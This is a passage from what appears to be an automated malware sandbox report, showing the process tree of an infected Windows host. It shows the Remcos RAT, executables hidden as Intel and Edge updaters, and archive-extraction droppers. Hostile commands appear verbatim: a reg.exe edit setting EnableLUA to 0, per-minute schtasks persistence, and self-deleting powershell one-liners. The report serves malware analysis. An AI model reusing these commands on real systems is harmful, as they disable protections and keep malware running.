                        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                          7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                          4⤵
                          • Executes dropped EXE
                          PID:4172
                        • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                          7z.exe e extracted/file_7.zip -oextracted
                          4⤵
                            PID:2316
                          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                            7z.exe e extracted/file_6.zip -oextracted
                            4⤵
                              PID:4148
                            • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                              7z.exe e extracted/file_5.zip -oextracted
                              4⤵
                                PID:3924
                              • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                7z.exe e extracted/file_4.zip -oextracted
                                4⤵
                                  PID:1488
                                • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                  7z.exe e extracted/file_3.zip -oextracted
                                  4⤵
                                    PID:5300
                                  • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                    7z.exe e extracted/file_2.zip -oextracted
                                    4⤵
                                      PID:4236
                                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                      7z.exe e extracted/file_1.zip -oextracted
                                      4⤵
                                        PID:540
                                      • C:\Windows\system32\attrib.exe
                                        attrib +H "in.exe"
                                        4⤵
                                        • Views/modifies file attributes
                                        PID:2980
                                      • C:\Users\Admin\AppData\Local\Temp\main\in.exe
                                        "in.exe"
                                        4⤵
                                          PID:548
                                          • C:\Windows\system32\attrib.exe
                                            attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                            5⤵
                                            • Views/modifies file attributes
                                            PID:6984
                                          • C:\Windows\system32\attrib.exe
                                            attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                            5⤵
                                            • Views/modifies file attributes
                                            PID:1912
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                            5⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2944
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell ping 127.0.0.1; del in.exe
                                            5⤵
                                            • System Network Configuration Discovery: Internet Connection Discovery
                                            PID:1864
                                            • C:\Windows\system32\PING.EXE
                                              "C:\Windows\system32\PING.EXE" 127.0.0.1
                                              6⤵
                                              • System Network Configuration Discovery: Internet Connection Discovery
                                              • Runs ping.exe
                                              PID:4404
                                    • C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
                                      "C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      PID:5792
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 664
                                        3⤵
                                        • Program crash
                                        PID:2976
                                    • C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
                                      "C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:5648
                                    • C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
                                      "C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
                                      2⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Checks processor information in registry
                                      PID:5388
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp2684.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp2684.tmp.bat
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:6272
                                    • C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
                                      "C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
                                      2⤵
                                      • Drops file in Program Files directory
                                      PID:3620
                                    • C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
                                      "C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
                                      2⤵
                                      • Adds policy Run key to start application
                                      • Adds Run key to start application
                                      • System Location Discovery: System Language Discovery
                                      PID:1880
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:6868
                                        • C:\Windows\SysWOW64\reg.exe
                                          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                          4⤵
                                          • UAC bypass
                                          • System Location Discovery: System Language Discovery
                                          • Modifies registry key
                                          PID:6448
                                      • C:\Windows\SysWOW64\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4900
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2212
                                          • C:\ProgramData\Remcos\remcos.exe
                                            C:\ProgramData\Remcos\remcos.exe
                                            5⤵
                                            • Adds policy Run key to start application
                                            • Adds Run key to start application
                                            • Suspicious use of SetThreadContext
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: MapViewOfSection
                                            PID:688
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                              6⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:3300
                                              • C:\Windows\SysWOW64\reg.exe
                                                C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                7⤵
                                                • UAC bypass
                                                • System Location Discovery: System Language Discovery
                                                • Modifies registry key
                                                PID:2292
                                            • \??\c:\program files (x86)\internet explorer\iexplore.exe
                                              "c:\program files (x86)\internet explorer\iexplore.exe"
                                              6⤵
                                              • Adds policy Run key to start application
                                              • Adds Run key to start application
                                              • Suspicious use of SetThreadContext
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: MapViewOfSection
                                              • Suspicious use of SetWindowsHookEx
                                              PID:3440
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                7⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:3472
                                                • C:\Windows\SysWOW64\reg.exe
                                                  C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                  8⤵
                                                  • UAC bypass
                                                  • System Location Discovery: System Language Discovery
                                                  • Modifies registry key
                                                  PID:4092
                                              • C:\Windows\SysWOW64\svchost.exe
                                                svchost.exe
                                                7⤵
                                                  PID:3940
                                      • C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
                                        "C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
                                        2⤵
                                        • Drops file in Program Files directory
                                        PID:1528
                                        • C:\Windows\System32\certutil.exe
                                          "C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp1BFB.tmp"
                                          3⤵
                                            PID:6108
                                        • C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
                                          2⤵
                                          • Suspicious use of SetThreadContext
                                          • System Location Discovery: System Language Discovery
                                          PID:944
                                          • C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe
                                            "C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe"
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2372
                                        • C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\gU8ND0g.exe"
                                          2⤵
                                            PID:3176
                                            • C:\Windows\system32\attrib.exe
                                              attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                              3⤵
                                              • Views/modifies file attributes
                                              PID:3792
                                            • C:\Windows\system32\attrib.exe
                                              attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                              3⤵
                                              • Views/modifies file attributes
                                              PID:3796
                                            • C:\Windows\system32\schtasks.exe
                                              schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
                                              3⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:3816
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell ping 127.0.0.1; del gU8ND0g.exe
                                              3⤵
                                              • System Network Configuration Discovery: Internet Connection Discovery
                                              PID:3844
                                              • C:\Windows\system32\PING.EXE
                                                "C:\Windows\system32\PING.EXE" 127.0.0.1
                                                4⤵
                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                • Runs ping.exe
                                                PID:6416
                                          • C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe
                                            "C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe"
                                            2⤵
                                            • Adds Run key to start application
                                            • Drops file in Program Files directory
                                            PID:3904
                                            • C:\Program Files\Windows Media Player\graph\graph.exe
                                              "C:\Program Files\Windows Media Player\graph\graph.exe"
                                              3⤵
                                                PID:3612
                                            • C:\Users\Admin\AppData\Local\Temp\a\888.exe
                                              "C:\Users\Admin\AppData\Local\Temp\a\888.exe"
                                              2⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:5972
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5972 -s 380
                                                3⤵
                                                • Program crash
                                                PID:4388
                                          • C:\Windows\system32\msiexec.exe
                                            C:\Windows\system32\msiexec.exe /V
                                            1⤵
                                            • Blocklisted process makes network request
                                            • Adds Run key to start application
                                            • Enumerates connected drives
                                            • Drops file in Windows directory
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:6616
                                            • C:\Windows\syswow64\MsiExec.exe
                                              C:\Windows\syswow64\MsiExec.exe -Embedding A3AD38B1F37553470F46D4A483762434 C
                                              2⤵
                                              • Loads dropped DLL
                                              • Drops file in Windows directory
                                              • System Location Discovery: System Language Discovery
                                              PID:6884
                                            • C:\Windows\syswow64\MsiExec.exe
                                              C:\Windows\syswow64\MsiExec.exe -Embedding 158922D7BC91519203A8F52E0E575224
                                              2⤵
                                              • Loads dropped DLL
                                              • System Location Discovery: System Language Discovery
                                              PID:5388
                                              • C:\Windows\SysWOW64\rundll32.exe
                                                rundll32.exe "C:\Windows\Installer\MSI8FF8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259625163 1 CustomActions!CustomActions.CustomActions.StartApp
                                                3⤵
                                                • Loads dropped DLL
                                                • Drops file in Windows directory
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:5576
                                                • C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe
                                                  "C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe"
                                                  4⤵
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Sets desktop wallpaper using registry
                                                  • System Location Discovery: System Language Discovery
                                                  • Modifies Control Panel
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of FindShellTrayWindow
                                                  • Suspicious use of SendNotifyMessage
                                                  PID:2224
                                                  • C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BWCUpdater.exe
                                                    "C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BWCUpdater.exe" "{\"BWCU\":{\"fileName\":\"BWCUpdater.exe\",\"version\":\"2.0.1.4\",\"downloadURL\":\"https://download.microsoft.com/download/a/b/9/ab92b51f-92ea-4d46-9d21-9446bd20eed8/Update/BWCU/2.0.1.4/BWCUpdater.exe\",\"startApp\":\"BWApp\",\"forcelaunch\":\"0\",\"isMajorUpdate\":\"1\",\"BWCI\":{\"fileName\":\"BWCStartMSI.exe\",\"downloadURL\":\"https://download.microsoft.com/download/a/b/9/ab92b51f-92ea-4d46-9d21-9446bd20eed8/Update/BWCI/2.0.1.4/BWCStartMSI.exe\"},\"Components\":{\"BWApp\":{\"fileName\":\"BingWallpaperApp.exe\",\"version\":\"2.0.1.4\",\"downloadURL\":\"https://download.microsoft.com/download/a/b/9/ab92b51f-92ea-4d46-9d21-9446bd20eed8/Update/BWApp/2.0.1.4/BingWallpaperApp.exe\"},\"VSCM\":{\"fileName\":\"BingVisualSearchContextMenu.dll\",\"version\":\"1.0.7.8\",\"isMoveToTempRequired\":\"1\",\"optional\":\"IsVSEnabled\",\"downloadURL32\":\"https://go.microsoft.com/fwlink/?linkid=2142132\",\"downloadURL64\":\"https://go.microsoft.com/fwlink/?linkid=2142305\"},\"VSBL\":{\"fileName\":\"BingVisualSearchLauncher.exe\",\"version\":\"1.0.7.8\",\"optional\":\"IsVSEnabled\",\"downloadURL\":\"https://go.microsoft.com/fwlink/?linkid=2142207\"}}},\"hpwpdownloadAPI\":\"https://go.microsoft.com/fwlink/?linkid=2151983\",\"switch\":\"\",\"hbInterval\":\"1\",\"notifyAppInstall\":\"1\",\"notifyDailyRefresh\":\"1\",\"showNotificationAll\":\"1\",\"showImageNotification\":\"1\",\"showRecommendations\":\"1\",\"enableExtension\":\"1\",\"ShareSwitch\":\"1\",\"BNPSignal\":{\"ScanInterval\":\"12\",\"SendSignalOnChange\":1,\"ScheduledSignalInterval\":\"3\",\"SupportedBrowsers\":\"000\",\"APISwitch\":1},\"MEReset\":{\"Delay\":3,\"Type\":{\"NewUsers\":1,\"ExistingUsers\":1}}}"
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3788
                                              • C:\Windows\SysWOW64\rundll32.exe
                                                rundll32.exe "C:\Windows\Installer\MSI97A6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259627113 7 CustomActions!CustomActions.CustomActions.InstallPing
                                                3⤵
                                                • Blocklisted process makes network request
                                                • Checks computer location settings
                                                • Loads dropped DLL
                                                • Drops file in Windows directory
                                                • System Location Discovery: System Language Discovery
                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                PID:1488
                                            • C:\Windows\syswow64\MsiExec.exe
                                              C:\Windows\syswow64\MsiExec.exe -Embedding D07DCEDC9FDD00FC43C3050A42B7997D C
                                              2⤵
                                              • Loads dropped DLL
                                              • System Location Discovery: System Language Discovery
                                              PID:2384
                                          • C:\Windows\system32\taskeng.exe
                                            taskeng.exe {485DBF57-2597-4ADB-806A-907CE678CD8C} S-1-5-21-3692679935-4019334568-335155002-1000:BCXRJFKE\Admin:Interactive:[1]
                                            1⤵
                                              PID:5812
                                              • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                2⤵
                                                • Suspicious use of SetThreadContext
                                                PID:4824
                                                • C:\Windows\explorer.exe
                                                  explorer.exe
                                                  3⤵
                                                  • Suspicious use of FindShellTrayWindow
                                                  PID:6128
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                  3⤵
                                                  • Drops file in System32 directory
                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                  PID:6456
                                                  • C:\Windows\system32\PING.EXE
                                                    "C:\Windows\system32\PING.EXE" 127.1.0.1
                                                    4⤵
                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                    • Runs ping.exe
                                                    PID:5484
                                              • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                2⤵
                                                • Suspicious use of SetThreadContext
                                                PID:4444
                                                • C:\Windows\explorer.exe
                                                  explorer.exe
                                                  3⤵
                                                    PID:6552
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                    3⤵
                                                    • Drops file in System32 directory
                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                    PID:7160
                                                    • C:\Windows\system32\PING.EXE
                                                      "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                      4⤵
                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                      • Runs ping.exe
                                                      PID:1760
                                                • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                  C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                  2⤵
                                                  • Suspicious use of SetThreadContext
                                                  PID:1796
                                                  • C:\Windows\explorer.exe
                                                    explorer.exe
                                                    3⤵
                                                      PID:3308
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                      3⤵
                                                      • Drops file in System32 directory
                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                      PID:2212
                                                      • C:\Windows\system32\PING.EXE
                                                        "C:\Windows\system32\PING.EXE" 127.1.0.1
                                                        4⤵
                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                        • Runs ping.exe
                                                        PID:3732
                                                  • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                    C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                    2⤵
                                                    • Suspicious use of SetThreadContext
                                                    PID:5064
                                                    • C:\Windows\explorer.exe
                                                      explorer.exe
                                                      3⤵
                                                        PID:688
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                        3⤵
                                                        • Drops file in System32 directory
                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                        PID:3420
                                                        • C:\Windows\system32\PING.EXE
                                                          "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                          4⤵
                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                          • Runs ping.exe
                                                          PID:7048
                                                    • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                      C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                      2⤵
                                                      • Suspicious use of SetThreadContext
                                                      PID:4620
                                                      • C:\Windows\explorer.exe
                                                        explorer.exe
                                                        3⤵
                                                          PID:332
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                          3⤵
                                                          • Drops file in System32 directory
                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                          PID:7128
                                                          • C:\Windows\system32\PING.EXE
                                                            "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                            4⤵
                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                            • Runs ping.exe
                                                            PID:2864
                                                      • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                        C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                        2⤵
                                                        • Suspicious use of SetThreadContext
                                                        PID:4616
                                                        • C:\Windows\explorer.exe
                                                          explorer.exe
                                                          3⤵
                                                            PID:5140
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                            3⤵
                                                            • Drops file in System32 directory
                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                            PID:5908
                                                            • C:\Windows\system32\PING.EXE
                                                              "C:\Windows\system32\PING.EXE" 127.1.0.1
                                                              4⤵
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              • Runs ping.exe
                                                              PID:6164
                                                        • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                          C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                          2⤵
                                                          • Suspicious use of SetThreadContext
                                                          PID:6368
                                                          • C:\Windows\explorer.exe
                                                            explorer.exe
                                                            3⤵
                                                              PID:3984
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                              3⤵
                                                              • Drops file in System32 directory
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              PID:6916
                                                              • C:\Windows\system32\PING.EXE
                                                                "C:\Windows\system32\PING.EXE" 127.1.0.1
                                                                4⤵
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:6724
                                                          • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                            C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                            2⤵
                                                            • Suspicious use of SetThreadContext
                                                            PID:6756
                                                            • C:\Windows\explorer.exe
                                                              explorer.exe
                                                              3⤵
                                                                PID:1824
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                3⤵
                                                                • Drops file in System32 directory
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                PID:2344
                                                                • C:\Windows\system32\PING.EXE
                                                                  "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                  4⤵
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  • Runs ping.exe
                                                                  PID:5836
                                                            • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                              C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                              2⤵
                                                              • Suspicious use of SetThreadContext
                                                              PID:4028
                                                              • C:\Windows\explorer.exe
                                                                explorer.exe
                                                                3⤵
                                                                  PID:3588
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                                  3⤵
                                                                  • Drops file in System32 directory
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  PID:6544
                                                                  • C:\Windows\system32\PING.EXE
                                                                    "C:\Windows\system32\PING.EXE" 127.1.0.1
                                                                    4⤵
                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                    • Runs ping.exe
                                                                    PID:6508
                                                              • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                2⤵
                                                                • Suspicious use of SetThreadContext
                                                                PID:5588
                                                                • C:\Windows\explorer.exe
                                                                  explorer.exe
                                                                  3⤵
                                                                    PID:3580
                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                    3⤵
                                                                    • Drops file in System32 directory
                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                    PID:3348
                                                                    • C:\Windows\system32\PING.EXE
                                                                      "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                      4⤵
                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                      • Runs ping.exe
                                                                      PID:6140
                                                                • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                                  C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                                  2⤵
                                                                  • Suspicious use of SetThreadContext
                                                                  PID:5760
                                                                  • C:\Windows\explorer.exe
                                                                    explorer.exe
                                                                    3⤵
                                                                      PID:2968
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                                      3⤵
                                                                      • Drops file in System32 directory
                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                      PID:3328
                                                                      • C:\Windows\system32\PING.EXE
                                                                        "C:\Windows\system32\PING.EXE" 127.1.0.1
                                                                        4⤵
                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                        • Runs ping.exe
                                                                        PID:2644
                                                                  • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                    C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                    2⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:5692
                                                                    • C:\Windows\explorer.exe
                                                                      explorer.exe
                                                                      3⤵
                                                                        PID:2364
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                        3⤵
                                                                        • Drops file in System32 directory
                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                        PID:4744
                                                                        • C:\Windows\system32\PING.EXE
                                                                          "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                          4⤵
                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                          • Runs ping.exe
                                                                          PID:4812
                                                                    • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                                      C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                                      2⤵
                                                                      • Suspicious use of SetThreadContext
                                                                      PID:1264
                                                                      • C:\Windows\explorer.exe
                                                                        explorer.exe
                                                                        3⤵
                                                                          PID:4152
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                                          3⤵
                                                                          • Drops file in System32 directory
                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                          PID:852
                                                                          • C:\Windows\system32\PING.EXE
                                                                            "C:\Windows\system32\PING.EXE" 127.1.0.1
                                                                            4⤵
                                                                            • Runs ping.exe
                                                                            PID:2912
                                                                      • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                        C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                        2⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:4064
                                                                        • C:\Windows\explorer.exe
                                                                          explorer.exe
                                                                          3⤵
                                                                            PID:6344
                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                            3⤵
                                                                            • Drops file in System32 directory
                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                            PID:2444
                                                                            • C:\Windows\system32\PING.EXE
                                                                              "C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                              4⤵
                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                              • Runs ping.exe
                                                                              PID:6564
                                                                        • C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                                          C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                                          2⤵
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:3468
                                                                          • C:\Windows\explorer.exe
                                                                            explorer.exe
                                                                            3⤵
                                                                              PID:1908
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
                                                                              3⤵
                                                                              • Drops file in System32 directory
                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                              PID:6680
                                                                              • C:\Windows\system32\PING.EXE
                                                                                "C:\Windows\system32\PING.EXE" 127.1.0.1
                                                                                4⤵
                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                • Runs ping.exe
                                                                                PID:3708
                                                                          • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                            C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                            2⤵
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:7128
                                                                            • C:\Windows\explorer.exe
                                                                              explorer.exe
                                                                              3⤵
                                                                                PID:3836
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                                3⤵
                                                                                • Drops file in System32 directory
                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                PID:3724
                                                                                • C:\Windows\system32\PING.EXE
